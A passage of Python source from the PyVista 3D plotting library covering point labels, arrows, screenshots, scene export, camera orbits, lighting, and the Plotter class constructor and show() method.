self.add_mesh(vtkpoints, color=point_color, point_size=point_size,
name=f'{name}-points', pickable=pickable,
render_points_as_spheres=render_points_as_spheres,
reset_camera=reset_camera, render=render)
label_actor = _vtk.vtkActor2D()
label_actor.SetMapper(labelMapper)
self.add_actor(label_actor, reset_camera=False,
name=f'{name}-labels', pickable=False)
return label_actor
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : numpy.ndarray or pyvista.DataSet
An ``n x 3`` numpy.ndarray or pyvista dataset with points.
labels : str, optional
String name of the point data array to use.
fmt : str, optional
String formatter used to format numerical data.
preamble : str, optional
Text before the start of each label.
**kwargs : dict, optional
Keyword arguments passed to
:func:`pyvista.BasePlotter.add_point_labels`.
Returns
-------
vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
"""
if not is_pyvista_dataset(points):
raise TypeError(f'input points must be a pyvista dataset, not: {type(points)}')
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = self._theme.font.fmt
if fmt is None:
fmt = '%.6e'
scalars = points.point_data[labels]
phrase = f'{preamble} %.3e'
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh.
Parameters
----------
points : numpy.ndarray or pyvista.DataSet
Array of points or the points from a pyvista object.
**kwargs : dict, optional
See :func:`pyvista.BasePlotter.add_mesh` for optional
keyword arguments.
Returns
-------
vtk.vtkActor
Actor of the mesh.
Examples
--------
Add a numpy array of points to a mesh.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> pl = pyvista.Plotter()
>>> actor = pl.add_points(points, render_points_as_spheres=True,
... point_size=100.0)
>>> pl.show()
"""
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to the plotter.
Parameters
----------
cent : np.ndarray
Array of centers.
direction : np.ndarray
Array of direction vectors.
mag : float, optional
Amount to scale the direction vectors.
**kwargs : dict, optional
See :func:`pyvista.BasePlotter.add_mesh` for optional
keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the arrows.
Examples
--------
Plot a random field of vectors and save a screenshot of it.
>>> import numpy as np
>>> import pyvista
>>> cent = np.random.random((10, 3))
>>> direction = np.random.random((10, 3))
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_arrows(cent, direction, mag=2)
>>> plotter.show()
"""
if cent.shape != direction.shape: # pragma: no cover
raise ValueError('center and direction arrays must have the same shape')
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
if mag != 1:
direction = direction*mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = _vtk.vtkArrowSource()
arrow.Update()
glyph3D = _vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img):
"""Save to file and/or return a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise ValueError('Empty image. Have you run plot() first?')
# write screenshot to file if requested
if isinstance(filename, (str, pathlib.Path, io.BytesIO)):
from PIL import Image
if isinstance(filename, (str, pathlib.Path)):
filename = pathlib.Path(filename)
if isinstance(pyvista.FIGURE_PATH, str) and not filename.is_absolute():
filename = pathlib.Path(os.path.join(pyvista.FIGURE_PATH, filename))
if not filename.suffix:
filename = filename.with_suffix('.png')
elif filename.suffix not in SUPPORTED_FORMATS:
raise ValueError(f'Unsupported extension {filename.suffix}\n' +
f'Must be one of the following: {SUPPORTED_FORMATS}')
filename = os.path.abspath(os.path.expanduser(str(filename)))
Image.fromarray(image).save(filename)
else:
Image.fromarray(image).save(filename, format="PNG")
# return image array if requested
if return_img:
return image
def save_graphic(self, filename, title='PyVista Export',
raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
This can be helpful for publication documents.
The supported formats are:
* ``'.svg'``
* ``'.eps'``
* ``'.ps'``
* ``'.pdf'``
* ``'.tex'``
Parameters
----------
filename : str
Path to fsave the graphic file to.
title : str, optional
Title to use within the file properties.
raster : bool, optional
Attempt to write 3D properties as a raster image.
painter : bool, optional
Configure the exporter to expect a painter-ordered 2D
rendering, that is, a rendering at a fixed depth where
primitives are drawn from the bottom up.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(examples.load_airplane(), smooth_shading=True)
>>> _ = pl.add_background_image(examples.mapfile)
>>> pl.save_graphic("img.svg") # doctest:+SKIP
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
writer = _vtk.lazy_vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
if extension not in modes:
raise ValueError(f"Extension ({extension}) is an invalid choice.\n\n"
f"Valid options include: {', '.join(modes.keys())}")
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
def screenshot(self, filename=None, transparent_background=None,
return_img=True, window_size=None):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, pathlib.Path, BytesIO, optional
Location to write image to. If ``None``, no image is written.
transparent_background : bool, optional
Whether to make the background transparent. The default is
looked up on the plotter's theme.
return_img : bool, optional
If ``True`` (the default), a NumPy array of the image will
be returned.
window_size : 2-length tuple, optional
Set the plotter's size to this ``(width, height)`` before
taking the screenshot.
Returns
-------
numpy.ndarray
Array containing pixel RGB and alpha. Sized:
* [Window height x Window width x 3] if
``transparent_background`` is set to ``False``.
* [Window height x Window width x 4] if
``transparent_background`` is set to ``True``.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = self._theme.transparent_background
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery to work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if self.last_image is not None:
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise RuntimeError('This plotter is closed and unable to save a screenshot.')
if self._first_time and not self.off_screen:
raise RuntimeError("Nothing to screenshot - call .show first or "
"use the off_screen argument")
# if off screen, show has not been called and we must render
# before extracting an image
if self._first_time:
self._on_first_render_request()
self.render()
return self._save_image(self.image, filename, return_img)
@wraps(Renderers.set_background)
def set_background(self, *args, **kwargs):
"""Wrap ``Renderers.set_background``."""
self.renderers.set_background(*args, **kwargs)
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float, optional
A scaling factor when building the orbital extent.
n_points : int, optional
Number of points on the orbital path.
viewup : list(float), optional
The normal to the orbital plane.
shift : float, optional
Shift the plane up/down from the center of the scene by
this amount.
Returns
-------
pyvista.PolyData
PolyData containing the orbital path.
Examples
--------
Generate an orbital path around a sphere.
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> viewup = [0, 0, 1]
>>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=50,
... shift=0.0, viewup=viewup)
See :ref:`orbiting_example` for a full example using this method.
"""
if viewup is None:
viewup = self._theme.camera['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
Parameters
----------
point : sequence
Point to fly to in the form of ``(x, y, z)``.
"""
self.iren.fly_to(self.renderer, point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
write_frames=False, threaded=False, progress_bar=False):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order in the points is the order of
travel.
focus : list(float) of length 3, optional
The point of focus the camera.
step : float, optional
The timestep between flying to each camera position.
viewup : list(float), optional
The normal to the orbital plane.
write_frames : bool, optional
Assume a file is open and write a frame on each camera
view during the orbit.
threaded : bool, optional
Run this as a background thread. Generally used within a
GUI (i.e. PyQt).
progress_bar : bool, optional
Show the progress bar when proceeding through the path.
This can be helpful to show progress when generating
movies with ``off_screen=True``.
Examples
--------
Plot an orbit around the earth. Save the gif as a temporary file.
>>> import tempfile
>>> import os
>>> import pyvista
>>> filename = os.path.join(tempfile._get_default_tempdir(),
... next(tempfile._get_candidate_names()) + '.gif')
>>> from pyvista import examples
>>> plotter = pyvista.Plotter(window_size=[300, 300])
>>> _ = plotter.add_mesh(examples.load_globe(), smooth_shading=True)
>>> plotter.open_gif(filename)
>>> viewup = [0, 0, 1]
>>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=24,
... shift=0.0, viewup=viewup)
>>> plotter.orbit_on_path(orbit, write_frames=True, viewup=viewup,
... step=0.02)
See :ref:`orbiting_example` for a full example using this method.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = self._theme.camera['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.thickness = path.length
if progress_bar:
try: # pragma: no cover
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to use ``progress_bar=True``")
def orbit():
"""Define the internal thread for running the orbit."""
if progress_bar: # pragma: no cover
points_seq = tqdm(points)
else:
points_seq = points
for point in points_seq:
tstart = time.time() # include the render time in the step time
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
self.renderer.ResetCameraClippingRange()
if write_frames:
self.write_frame()
else:
self.render()
sleep_time = step - (time.time() - tstart)
if sleep_time > 0:
time.sleep(sleep_time)
if write_frames:
self.mwriter.close()
if threaded:
thread = Thread(target=orbit)
thread.start()
else:
orbit()
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
Parameters
----------
filename : str
Filename to export the scene to. A filename extension of
``'.vtkjs'`` will be added.
compress_arrays : bool, optional
Enable array compression.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(examples.load_hexbeam())
>>> pl.export_vtkjs("sample") # doctest:+SKIP
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format.
Parameters
----------
filename : str
Filename to export the scene to. Should end in ``'.obj'``.
Returns
-------
vtkOBJExporter
Object exporter.
"""
# lazy import vtkOBJExporter here as it takes a long time to
# load and is not always used
try:
from vtkmodules.vtkIOExport import vtkOBJExporter
except:
from vtk import vtkOBJExporter
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
# We have to check here if it has the closed attribute as it
# may not exist should the plotter have failed to initialize.
if hasattr(self, '_closed'):
if not self._closed:
self.close()
self.deep_clean()
if hasattr(self, 'renderers'):
del self.renderers
def add_background_image(self, image_path, scale=1, auto_resize=True,
as_global=True):
"""Add a background image to a plot.
Parameters
----------
image_path : str
Path to an image file.
scale : float, optional
Scale the image larger or smaller relative to the size of
the window. For example, a scale size of 2 will make the
largest dimension of the image twice as large as the
largest dimension of the render window. Defaults to 1.
auto_resize : bool, optional
Resize the background when the render window changes size.
as_global : bool, optional
When multiple render windows are present, setting
``as_global=False`` will cause the background to only
appear in one window.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.add_background_image(examples.mapfile)
>>> plotter.show()
"""
if self.renderers.has_active_background_renderer:
raise RuntimeError('A background image already exists. '
'Remove it with ``remove_background_image`` '
'before adding one')
# Need to change the number of layers to support an additional
# background layer
if not self._has_background_layer:
self.ren_win.SetNumberOfLayers(3)
renderer = self.renderers.add_background_renderer(image_path, scale, as_global)
self.ren_win.AddRenderer(renderer)
# setup autoscaling of the image
if auto_resize: # pragma: no cover
self.iren.add_observer('ModifiedEvent', renderer.resize)
@wraps(Renderers.remove_background_image)
def remove_background_image(self):
"""Wrap ``Renderers.remove_background_image``."""
self.renderers.remove_background_image()
# return the active renderer to the top, otherwise flat background
# will not be rendered
self.renderer.layer = 0
def _on_first_render_request(self, cpos=None):
"""Once an image or render is officially requested, run this routine.
For example on the show call or any screenshot producing code.
"""
# reset unless camera for the first render unless camera is set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
def reset_camera_clipping_range(self):
"""Reset camera clipping planes."""
self.renderer.ResetCameraClippingRange()
def add_light(self, light, only_active=False):
"""Add a Light to the scene.
Parameters
----------
light : Light or vtkLight
The light to be added.
only_active : bool, optional
If ``True``, only add the light to the active
renderer. The default is that every renderer adds the
light. To add the light to an arbitrary renderer, see
:func:`pyvista.plotting.renderer.Renderer.add_light`.
Examples
--------
Create a plotter that we initialize with no lights, and add a
cube and a single headlight to it.
>>> import pyvista as pv
>>> plotter = pv.Plotter(lighting='none')
>>> _ = plotter.add_mesh(pv.Cube())
>>> light = pv.Light(color='cyan', light_type='headlight')
>>> plotter.add_light(light)
>>> plotter.show()
"""
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.add_light(light)
def remove_all_lights(self, only_active=False):
"""Remove all lights from the scene.
Parameters
----------
only_active : bool
If ``True``, only remove lights from the active
renderer. The default is that lights are stripped from
every renderer.
Examples
--------
Create a plotter and remove all lights after initialization.
Note how the mesh rendered is completely flat
>>> import pyvista as pv
>>> plotter = pv.Plotter()
>>> plotter.remove_all_lights()
>>> plotter.renderer.lights
[]
>>> _ = plotter.add_mesh(pv.Sphere(), show_edges=True)
>>> plotter.show()
Note how this differs from a plot with default lighting
>>> pv.Sphere().plot(show_edges=True, lighting=True)
"""
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.remove_all_lights()
def where_is(self, name):
"""Return the subplot coordinates of a given actor.
Parameters
----------
name : str
Actor's name.
Returns
-------
list(tuple(int))
A list with the subplot coordinates of the actor.
Examples
--------
>>> import pyvista as pv
>>> plotter = pv.Plotter(shape=(2, 2))
>>> plotter.subplot(0, 0)
>>> _ = plotter.add_mesh(pv.Box(), name='box')
>>> plotter.subplot(0, 1)
>>> _ = plotter.add_mesh(pv.Sphere(), name='sphere')
>>> plotter.subplot(1, 0)
>>> _ = plotter.add_mesh(pv.Box(), name='box')
>>> plotter.subplot(1, 1)
>>> _ = plotter.add_mesh(pv.Cone(), name='cone')
>>> plotter.where_is('box')
[(0, 0), (1, 0)]
>>> plotter.show()
"""
places = []
for index in range(len(self.renderers)):
if name in self.renderers[index]._actors:
places.append(tuple(self.renderers.index_to_loc(index)))
return places
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Parameters
----------
off_screen : bool, optional
Renders off screen when ``True``. Useful for automated
screenshots.
notebook : bool, optional
When ``True``, the resulting plot is placed inline a jupyter
notebook. Assumes a jupyter console is active. Automatically
enables ``off_screen``.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render
window. Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default ``False``.
border_color : str or 3 item list, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
window_size : list, optional
Window size in pixels. Defaults to ``[1024, 768]``, unless
set differently in the relevant theme's ``window_size``
property.
multi_samples : int, optional
The number of multi-samples used to mitigate aliasing. 4 is a
good default but 8 will have better results with a potential
impact on performance.
line_smoothing : bool, optional
If ``True``, enable line smoothing.
polygon_smoothing : bool, optional
If ``True``, enable polygon smoothing.
lighting : str, optional
What lighting to set up for the plotter.
Accepted options:
* ``'light_kit'``: a vtk Light Kit composed of 5 lights.
* ``'three lights'``: illumination using 3 lights.
* ``'none'``: no light sources at instantiation.
The default is a ``'light_kit'`` (to be precise, 5 separate
lights that act like a Light Kit).
theme : pyvista.themes.DefaultTheme, optional
Plot-specific theme.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(mesh, color='red')
>>> actor = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show()
"""
last_update_time = 0.0
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
groups=None, row_weights=None, col_weights=None,
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False,
splitting_position=None, title=None, lighting='light kit',
theme=None):
"""Initialize a vtk plotting object."""
super().__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width,
groups=groups, row_weights=row_weights,
col_weights=col_weights,
splitting_position=splitting_position,
title=title, lighting=lighting, theme=theme)
log.debug('Plotter init start')
# check if a plotting backend is enabled
_warn_xserver()
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent' and self.iren._style != "Context":
self.iren.terminate_app()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
if self._theme.notebook is not None:
notebook = self._theme.notebook
else:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
self._window_size_unset = False
if window_size is None:
self._window_size_unset = True
window_size = self._theme.window_size
self.__prior_window_size = window_size
if multi_samples is None:
multi_samples = self._theme.multi_samples
# initialize render window
self.ren_win = _vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
# Add the shadow renderer to allow us to capture interactions within
# a given viewport
# https://vtk.org/pipermail/vtkusers/2018-June/102030.html
number_or_layers = self.ren_win.GetNumberOfLayers()
current_layer = self.renderer.GetLayer()
self.ren_win.SetNumberOfLayers(number_or_layers + 1)
self.ren_win.AddRenderer(self.renderers.shadow_renderer)
self.renderers.shadow_renderer.SetLayer(current_layer + 1)
self.renderers.shadow_renderer.SetInteractive(False) # never needs to capture
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
# vtkGenericRenderWindowInteractor has no event loop and
# allows the display client to close on Linux when
# off_screen. We still want an interactor for off screen
# plotting since there are some widgets (like the axes
# widget) that need an interactor
interactor = _vtk.vtkGenericRenderWindowInteractor()
else:
interactor = None
# Add ren win and interactor
self.iren = RenderWindowInteractor(self, light_follow_camera=False,
interactor=interactor)
self.iren.set_render_window(self.ren_win)
self.enable_trackball_style() # internally calls update_style()
self.iren.add_observer("KeyPressEvent", self.key_press_event)
# Set camera widget based on theme. This requires that an
# interactor be present.
if self.theme._enable_camera_orientation_widget:
self.add_camera_orientation_widget()
# Set background
self.set_background(self._theme.background)
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
self.iren.add_observer(_vtk.vtkCommand.TimerEvent, on_timer)
if self._theme.depth_peeling.enabled:
if self.enable_depth_peeling():
for renderer in self.renderers:
renderer.enable_depth_peeling()
log.debug('Plotter init stop')
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=None,
screenshot=False, return_img=False, cpos=None, use_ipyvtk=None,
jupyter_backend=None, return_viewer=False, return_cpos=None,
**kwargs):
"""Display the plotting window.
Parameters
----------
title : str, optional
Title of plotting window. Defaults to
:attr:`pyvista.global_theme.title <pyvista.themes.DefaultTheme.title>`.
window_size : list, optional
Window size in pixels. Defaults to
:attr:`pyvista.global_theme.window_size <pyvista.themes.DefaultTheme.window_size>`.
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
Defaults to
:attr:`pyvista.global_theme.interactive <pyvista.themes.DefaultTheme.interactive>`.
auto_close : bool, optional
Exits plotting session when user closes the window when
interactive is ``True``. Defaults to
:attr:`pyvista.global_theme.auto_close <pyvista.themes.DefaultTheme.auto_close>`.
interactive_update : bool, optional
Disabled by default. Allows user to non-blocking draw,
user should call :func:`BasePlotter.update` in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
``window_size``. Defaults to
:attr:`pyvista.global_theme.full_screen <pyvista.themes.DefaultTheme.full_screen>`.
screenshot : str, pathlib.Path, BytesIO or bool, optional
Take a screenshot of the initial state of the plot.
If a string, it specifies the path to which the screenshot
is saved. If ``True``, the screenshot is returned as an
array. Defaults to ``False``. For interactive screenshots
it's recommended to first call ``show()`` with
``auto_close=False`` to set the scene, then save the
screenshot in a separate call to ``show()`` or
:func:`Plotter.screenshot`.
return_img : bool
Returns a numpy array representing the last image along
with the camera position.
cpos : list(tuple(floats))
The camera position. You can also set this with
:attr:`Plotter.camera_position`.
use_ipyvtk : bool, optional
Deprecated. Instead, set the backend either globally with
``pyvista.set_jupyter_backend('ipyvtklink')`` or with
``backend='ipyvtklink'``.
jupyter_backend : str, optional
Jupyter notebook plotting backend to use. One of the
following:
* ``'none'`` : Do not display in the notebook.
* ``'pythreejs'`` : Show a ``pythreejs`` widget
* ``'static'`` : Display a static figure.
* ``'ipygany'`` : Show a ``ipygany`` widget
* ``'panel'`` : Show a ``panel`` widget.
This can also be set globally with
:func:`pyvista.set_jupyter_backend`.
return_viewer : bool, optional
Return the jupyterlab viewer, scene, or display object
when plotting with jupyter notebook.
return_cpos : bool, optional
Return the last camera position from the render window
when enabled. Default based on theme setting. See
:attr:`pyvista.themes.DefaultTheme.return_cpos`.
**kwargs : dict, optional
Developer keyword arguments.
Returns
-------
cpos : list
List of camera position, focal point, and view up.
Returned only when ``return_cpos=True`` or set in the
default global or plot theme. Not returned when in a
jupyter notebook and ``return_viewer=True``.
image : np.ndarray
Numpy array of the last image when either ``return_img=True``
or ``screenshot=True`` is set. Not returned when in a
jupyter notebook with ``return_viewer=True``. Optionally
contains alpha values. Sized:
* [Window height x Window width x 3] if the theme sets
``transparent_background=False``.
* [Window height x Window width x 4] if the theme sets
``transparent_background=True``.
widget
IPython widget when ``return_viewer=True``.
Notes
-----
Please use the ``q``-key to close the plotter as some
operating systems (namely Windows) will experience issues
saving a screenshot if the exit button in the GUI is pressed.
Examples
--------
Simply show the plot of a mesh.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.show()
Take a screenshot interactively. Screenshot will be of the
first image shown, so use the first call with
``auto_close=False`` to set the scene before taking the
screenshot.
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.show(auto_close=False) # doctest:+SKIP
>>> pl.show(screenshot='my_image.png') # doctest:+SKIP
Display a ``pythreejs`` scene within a jupyter notebook
>>> pl.show(jupyter_backend='pythreejs') # doctest:+SKIP
Return a ``pythreejs`` scene.
>>> pl.show(jupyter_backend='pythreejs', return_viewer=True) # doctest:+SKIP
Obtain the camera position when using ``show``.
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Sphere())
>>> pl.show(return_cpos=True) # doctest:+SKIP
[(2.223005211686484, -0.3126909484828709, 2.4686209867735065),
(0.0, 0.0, 0.0),
(-0.6839951597283509, -0.47207319712073137, 0.5561452310578585)]
"""
# developer keyword argument: runs a function immediately prior to ``close``
self._before_close_callback = kwargs.pop('before_close_callback', None)
jupyter_kwargs = kwargs.pop('jupyter_kwargs', {})
assert_empty_kwargs(**kwargs)
if interactive_update and auto_close is None:
auto_close = False
elif interactive_update and auto_close:
warnings.warn(textwrap.dedent("""\
The plotter will close immediately automatically since ``auto_close=True``.
Either, do not specify ``auto_close``, or set it to ``False`` if you want to
interact with the plotter interactively.\
""")
)
elif auto_close is None:
auto_close = self._theme.auto_close
if use_ipyvtk:
txt = textwrap.dedent("""\
use_ipyvtk is deprecated. Set the backend
globally with ``pyvista.set_jupyter_backend("ipyvtklink"
or with ``backend="ipyvtklink"``)
""")
from pyvista.core.errors import DeprecationError
raise DeprecationError(txt)
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter has been closed and cannot be shown.")
if full_screen is None:
full_screen = self._theme.full_screen
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
else:
self._window_size_unset = False
self.ren_win.SetSize(window_size[0], window_size[1])
# reset unless camera for the first render unless camera is set
self._on_first_render_request(cpos)
# handle plotter notebook
if jupyter_backend and not self.notebook:
warnings.warn('Not within a jupyter notebook environment.\n'
'Ignoring ``jupyter_backend``.')
if self.notebook:
from ..jupyter.notebook import handle_plotter
if jupyter_backend is None:
jupyter_backend = self._theme.jupyter_backend
if jupyter_backend != 'none':
disp = handle_plotter(self, backend=jupyter_backend,
return_viewer=return_viewer,
**jupyter_kwargs)
return disp
self.render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
if pyvista.BUILDING_GALLERY or screenshot:
# always save screenshots for sphinx_gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
# See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270
if interactive and not self.off_screen:
try: # interrupts will be caught here
log.debug('Starting iren')
self.iren.update_style()
if not interactive_update:
# Resolves #1260
if os.name == 'nt':
if _vtk.VTK9:
self.iren.process_events()
else:
global VERY_FIRST_RENDER
if not VERY_FIRST_RENDER:
self.iren.start()
VERY_FIRST_RENDER = False
self.iren.start()
self.iren.initialize()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
# In the event that the user hits the exit-button on the GUI (on
# Windows OS) then it must be finalized and deleted as accessing it
# will kill the kernel.
# Here we check for that and clean it up before moving on to any of
# the closing routines that might try to still access that
# render window.
if not self.ren_win.IsCurrent():
self._clear_ren_win() # The ren_win is deleted
# proper screenshots cannot be saved if this happens
if not auto_close:
warnings.warn("`auto_close` ignored: by clicking the exit button, "
"you have destroyed the render window and we have to "
"close it out.")
auto_close = True
# NOTE: after this point, nothing from the render window can be accessed
# as if a user presed the close button, then it destroys the
# the render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Close the render window if requested
if auto_close:
self.close()
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
if return_cpos:
return self.camera_position, self.last_image
if return_cpos:
return self.camera_position
def add_title(self, title, font_size=18, color=None, font=None,
shadow=False):
"""Add text to the top center of the plot.
This is merely a convenience method that calls ``add_text``
with ``position='upper_edge'``.
Parameters
----------
title : str
The text to add the rendering.
font_size : float, optional
Sets the size of the title font. Defaults to 16 or the
value of the global theme if set.
color : str or 3 item list, optional,
Either a string, rgb list, or hex color string. Defaults
to white or the value of the global theme if set. For
example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
font : str, optional
Font name may be ``'courier'``, ``'times'``, or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
Returns
-------
vtk.vtkTextActor
Text actor added to plot.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.background_color = 'grey'
>>> actor = pl.add_title('Plot Title', font='courier', color='k',
... font_size=40)
>>> pl.show()
"""
# add additional spacing from the top of the figure by default
title = '\n' + title
return self.add_text(title, position='upper_edge',
font_size=font_size, color=color, font=font,
shadow=shadow, name='title', viewport=False)
def add_cursor(
self,
